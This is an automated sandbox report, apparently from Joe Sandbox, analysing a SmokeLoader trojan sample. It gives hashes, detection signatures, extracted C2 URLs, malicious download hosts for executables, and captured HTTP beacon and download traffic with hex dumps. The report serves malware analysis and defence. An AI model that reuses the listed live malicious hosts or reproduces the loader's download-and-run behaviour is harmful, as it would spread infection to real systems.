Windows Analysis Report UZ6FEqlix4

Overview

General Information

Sample Name: UZ6FEqlix4 (renamed file extension from none to exe)
Analysis ID: 545931
MD5: 5e0ed8966761e70ee0b8dcd141aafb4c
SHA1: 933e68212d0f6d029e920bd93e5dca7ca5bdcb7a
SHA256: 8bbdda1786e15a568a573a2f38762e95de138af969e0a13b96d7086aaa98bfc2
Tags: 32exeSmokeLoadertrojan
Infos:

Most interesting Screenshot:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}
Multi AV Scanner detection for submitted file
Source: UZ6FEqlix4.exe Virustotal: Detection: 58% Perma Link
Source: UZ6FEqlix4.exe Metadefender: Detection: 20% Perma Link
Source: UZ6FEqlix4.exe ReversingLabs: Detection: 62%
Antivirus detection for URL or domain
Source: http://unicupload.top/install5.exe URL Reputation: Label: phishing
Source: http://privacytools-foryou-777.com/downloads/toolspab3.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: unicupload.top Virustotal: Detection: 15% Perma Link
Source: host-data-coin-11.com Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\411F.exe Metadefender: Detection: 20% Perma Link
Source: C:\Users\user\AppData\Local\Temp\411F.exe ReversingLabs: Detection: 67%
Source: C:\Users\user\AppData\Roaming\eveggtb Metadefender: Detection: 20% Perma Link
Source: C:\Users\user\AppData\Roaming\eveggtb ReversingLabs: Detection: 67%
Machine Learning detection for sample
Source: UZ6FEqlix4.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\eveggtb Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\411F.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: UZ6FEqlix4.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: "C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source: Binary string: C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA, 0_2_0041CA09
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041AA72 TryEnterCriticalSection,BuildCommDCBAndTimeoutsA,GetNamedPipeHandleStateA,ReleaseMutex,AddAtomA,TzSpecificLocalTimeToSystemTime,SetConsoleCursorInfo,VerifyVersionInfoW,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,GetProcessPriorityBoost,FreeEnvironmentStringsA,VerifyVersionInfoA,FindFirstFileExA, 0_2_0041AA72

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: unicupload.top
Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe Domain query: infinity-cheats.com
Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://host-data-coin-11.com/
Source: Malware configuration extractor URLs: http://file-coin-host-12.com/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.233.81.115 185.233.81.115
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:02 GMTContent-Type: application/x-msdos-programContent-Length: 339456Connection: closeLast-Modified: Tue, 28 Dec 2021 12:56:02 GMTETag: W/"52e00-5d43457ecb7e9"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 1b b4 65 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ee 03 00 00 20 09 00 00 00 00 00 b0 3d 02 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 93 13 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc eb 03 00 28 00 00 00 00 90 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 24 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4e ed 03 00 00 10 00 00 00 ee 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 00 04 00 00 8c 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 65 6a 65 76 75 00 05 00 00 00 00 70 0c 00 00 02 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 7a 69 00 00 00 93 0d 00 00 00 80 0c 00 00 0e 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 90 0c 00 00 64 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ee 3b 00 00 00 00 0d 00 00 3c 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbbxvwuoso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yawyilmlp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oabgiwp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwrkvn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oskoy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhvtxw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kfdyfm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jealulibe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axnxlm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgnuugce.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kctmodtvj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lspsrkslr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://clunuonr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pebbfc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkoocu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xpkuvjioi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxjfh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ithwflphmf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
